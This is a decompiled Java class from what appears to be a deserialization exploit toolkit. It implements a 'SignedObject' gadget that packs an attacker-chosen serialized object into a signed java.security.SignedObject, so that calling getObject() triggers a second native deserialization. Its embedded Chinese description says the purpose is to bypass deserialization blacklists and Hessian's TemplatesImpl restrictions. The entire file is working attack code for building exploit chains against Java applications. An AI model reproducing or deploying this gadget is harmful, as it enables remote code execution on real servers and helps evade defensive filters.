package com.ar3h.chains.gadget.impl.javanative.jdk;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.CommonMethod;
import com.ar3h.chains.common.util.Reflections;
import flex.messaging.messages.AsyncMessageExt;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.Signature;
import org.postgresql.jdbc.EscapedFunctions;

@GadgetAnnotation(name = "SignedObject二次反序列化", description = "getObject()方法触发本链，实现Java原生的二次反序列化\nJava序列化数据以字节流形式存放，所以能绕过一些黑名单\n以及适用于 Hessian 反序列化中，能够建立与Java原生反序列化的桥梁，能够绕过Hessian反序列化中 TemplatesImpl 的限制", dependencies = {"jdk:java.security.SignedObject"}, priority = 30)
@GadgetTags(tags = {Tag.SignedObjectChain, Tag.Getter}, nextTags = {Tag.JavaNativeDeserializePayload, Tag.CustomJavaDeserialize})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/jdk/SignedObject.class */
public class SignedObject implements Gadget {
    String paramName = "object";
    String methodName = "getObject";

    public Object getObject(Object obj) throws Exception {
        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(AsyncMessageExt.CLASS_ALIAS);
        keyPairGenerator.initialize(1024);
        PrivateKey privateKey = keyPairGenerator.genKeyPair().getPrivate();
        Signature signature = Signature.getInstance(AsyncMessageExt.CLASS_ALIAS);
        java.security.SignedObject signedObject = new java.security.SignedObject(1, privateKey, signature);
        Reflections.setFieldValue(signedObject, "content", CommonMethod.handleSerialized(obj));
        Reflections.getMethod(signedObject, EscapedFunctions.SIGN, new Class[]{PrivateKey.class, Signature.class}).invoke(signedObject, privateKey, signature);
        return signedObject;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        Object doCreate = gadgetChain.doCreate(gadgetContext);
        gadgetContext.put(ContextTag.GETTER_PARAM_NAME_KEY, this.paramName);
        gadgetContext.put(ContextTag.SPECIAL_METHOD_NAME_KEY, this.methodName);
        gadgetContext.put(ContextTag.SUPER_CLASS_NAME_KEY, java.security.SignedObject.class);
        return getObject(doCreate);
    }
}
